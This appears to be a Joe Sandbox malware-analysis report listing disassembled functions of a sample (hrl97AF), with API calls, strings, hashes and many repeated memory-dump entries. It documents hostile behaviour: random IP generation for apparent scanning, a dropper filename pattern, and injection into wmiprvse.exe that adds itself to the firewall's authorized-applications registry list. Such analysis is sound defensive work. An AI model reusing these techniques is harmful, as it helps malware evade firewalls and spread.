Instruction Fuzzy Hash: 66416671144345ABD320DB60CD45BEB77A9ABC4704F004D3EF786A32C1DA75A9058B9B

Function 00403920 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 187librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 004039C6
GetLastError.KERNEL32 ref: 004039D2
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00403A05
InterlockedExchange.KERNEL32(?,00000000), ref: 00403A17
LocalAlloc.KERNEL32(00000040,00000008), ref: 00403A2B
FreeLibrary.KERNEL32(00000000), ref: 00403A48
GetProcAddress.KERNEL32(?,?), ref: 00403AA9
GetLastError.KERNEL32 ref: 00403AB5
RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 00403AE7

Strings

$, xrefs: 0040393C

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: ErrorExceptionLastLibraryRaise$AddressAllocExchangeFreeInterlockedLoadLocalProc
String ID: $
API String ID: 991255547-3993045852
Opcode ID: 256256f5bea5ef9629b74784c89f9cd366c968008bba8740bb1e0df359706086
Instruction ID: 003abd56770ea85181eee10679b32b4024c484e765cb6dd7374dfc17ffc6279b
Opcode Fuzzy Hash: 256256f5bea5ef9629b74784c89f9cd366c968008bba8740bb1e0df359706086
Instruction Fuzzy Hash: C3612DB5B006059FDB24CF99C984AAABBF9AB48301B10403EE956F7391D774EE04CF14

Function 00405620 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 178sleepthreadCOMMON

Download Yara Rule

APIs

ExitThread.KERNEL32 ref: 00405895

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Sleep.KERNEL32(00000028), ref: 00405887

Strings

p8@, xrefs: 004056D6
<6@, xrefs: 004057B6
AAAA, xrefs: 00405664
%d.%d.%d.%d, xrefs: 004057B0
E, xrefs: 00405744
8@, xrefs: 0040567F
[@, xrefs: 004056C1
L8@, xrefs: 0040569D

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: CountExitSleepThreadTickrand
String ID: %d.%d.%d.%d$<6@$AAAA$E$L8@$p8@$8@$[@
API String ID: 896407411-1437862014
Opcode ID: 2082310ec20457ce4bd3376e800f9b479eea37f891fde78d827ab7b4555d5ca3
Instruction ID: 7e6662bb6761759f066e7e86b2ee24da49ec5426ddd9b74326a3b1faf3b9be8f
Opcode Fuzzy Hash: 2082310ec20457ce4bd3376e800f9b479eea37f891fde78d827ab7b4555d5ca3
Instruction Fuzzy Hash: A0510470548380AAE320EF64CC45B5BB7E8EFD4308F00492DF695A72D1E7B595098B6B

Function 004020D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98librarystringloaderCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(001F0001,00000000,100200), ref: 004020DF
ReleaseMutex.KERNEL32(00000000), ref: 004020EC
CloseHandle.KERNEL32(00000000), ref: 004020F3
lstrcatA.KERNEL32(?,?), ref: 004021AC
GetProcAddress.KERNEL32(00000000,?), ref: 004021BF

Strings

<6@, xrefs: 00402193
100200, xrefs: 004020D3, 00402279
stf%c%c%c%c%c.exe, xrefs: 0040218D

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: Mutex$AddressCloseHandleOpenProcReleaselstrcat
String ID: 100200$<6@$stf%c%c%c%c%c.exe
API String ID: 2376757572-3190100693
Opcode ID: d112f5c9d013e11b3731d5647da893e1883a61e01d2132f2d5a6d2d8178d5850
Instruction ID: 7c7aac5ec1300530b19c54ce4657de090f08845e18d217751b06ad59df05bcf8
Opcode Fuzzy Hash: d112f5c9d013e11b3731d5647da893e1883a61e01d2132f2d5a6d2d8178d5850
Instruction Fuzzy Hash: B731EBF26443007BE760AB60DD0AFAF7668BB44706F00453DF746B61C1EDB49604866B

Function 7FE332CF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98sleeplibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,7FE332C3), ref: 7FE332D0
GetModuleFileNameA.KERNEL32(00000000,C:\Windows\sysWOW64\wbem\wmiprvse.exe,000000C8), ref: 7FE332E5
wsprintfA.USER32 ref: 7FE332FA
CreateThread.KERNEL32(00000000,00000000,7FE32C7D,00000000,00000000), ref: 7FE33343
CloseHandle.KERNEL32(?,0C1A4F68), ref: 7FE3334C
WSAStartup.WS2_32(00000101), ref: 7FE333D1
Sleep.KERNEL32(00001388,00000000,00000000), ref: 7FE333F3

Part of subcall function 7FE329F1: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE32A36
Part of subcall function 7FE329F1: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE32A55
Part of subcall function 7FE329F1: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE32A7F
Part of subcall function 7FE329F1: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE32A8C
Part of subcall function 7FE329F1: UnmapViewOfFile.KERNEL32(?), ref: 7FE32AA4

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE332F9
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE332E2, 7FE332F7

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: File$CloseHandleView$AddressCreateInformationModuleNameOpenProcQuerySectionSleepStartupSystemThreadUnmapwsprintf
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3988882592-1392025104
Opcode ID: 5a2e8885b122901e0e527b3c98aa0eb90efe88ce56f4889f66029a75c3141c74
Instruction ID: 806d303376319e10b4faa7ba5eb60574f11820cef6a731847cf1d174f778dc29
Opcode Fuzzy Hash: 5a2e8885b122901e0e527b3c98aa0eb90efe88ce56f4889f66029a75c3141c74
Instruction Fuzzy Hash: 82319031904719FFDB619F61CC0EFEA362CDF41711F404219F96A6A080DAF06F05CAA6

Function 009B32CF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98sleeplibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,009B32C3), ref: 009B32D0
GetModuleFileNameA.KERNEL32(00000000,C:\Windows\sysWOW64\wbem\wmiprvse.exe,000000C8), ref: 009B32E5
wsprintfA.USER32 ref: 009B32FA
CreateThread.KERNEL32(00000000,00000000,009B2C7D,00000000,00000000), ref: 009B3343
CloseHandle.KERNEL32(?,0C1A4F68), ref: 009B334C
WSAStartup.WS2_32(00000101), ref: 009B33D1
Sleep.KERNEL32(00001388,00000000,00000000), ref: 009B33F3

Part of subcall function 009B29F1: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 009B2A36
Part of subcall function 009B29F1: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 009B2A55
Part of subcall function 009B29F1: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 009B2A7F
Part of subcall function 009B29F1: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 009B2A8C
Part of subcall function 009B29F1: UnmapViewOfFile.KERNEL32(?), ref: 009B2AA4

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 009B32E2, 009B32F7
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 009B330F
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 009B32F9

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: File$CloseHandleView$AddressCreateInformationModuleNameOpenProcQuerySectionSleepStartupSystemThreadUnmapwsprintf
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3988882592-1392025104
Opcode ID: 5a2e8885b122901e0e527b3c98aa0eb90efe88ce56f4889f66029a75c3141c74
Instruction ID: 85caea9f831230e214a23bae2b931ce151e7de05c9948ea5f9cfed6659e6b80a
Opcode Fuzzy Hash: 5a2e8885b122901e0e527b3c98aa0eb90efe88ce56f4889f66029a75c3141c74
Instruction Fuzzy Hash: FD31AF32504609FBDB61AF65CC4EFEB3B6CEF81721F404219F9196A080DAF06F0586E6

Function 0040348F Relevance: 16.6, APIs: 11, Instructions: 111COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 004034BC
__p__fmode.MSVCRT ref: 004034D1
__p__commode.MSVCRT ref: 004034DF
__setusermatherr.MSVCRT ref: 0040350B
_initterm.MSVCRT ref: 00403521
__getmainargs.MSVCRT ref: 00403544
_initterm.MSVCRT ref: 00403554
GetStartupInfoA.KERNEL32(?), ref: 00403593
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004035B7
exit.MSVCRT ref: 004035C7
_XcptFilter.MSVCRT ref: 004035D9

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: e284ab8ee17c914b7e9ddb28410b1748839fce9069ce7daa9396d3e96ef4b395
Instruction ID: dc900e3830a3569765129a6993a161ee3a7e101abcc0f586eb7ca925653150ca
Opcode Fuzzy Hash: e284ab8ee17c914b7e9ddb28410b1748839fce9069ce7daa9396d3e96ef4b395
Instruction Fuzzy Hash: 9C414AB1840304AFDB209FA4DD45AAA7FACEB09711F20057EE842B72E1D7785A41CF68

Function 00404EC0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 172sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Sleep.KERNEL32(0000000A,?,?,?,00000200), ref: 0040510F
ExitThread.KERNEL32 ref: 00405118

Strings

p8@, xrefs: 00404F16
@, xrefs: 00404FA7
P, xrefs: 00405029
E, xrefs: 00404F8B
8@, xrefs: 00404EEC
[@, xrefs: 00404F05
L8@, xrefs: 00404F62

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
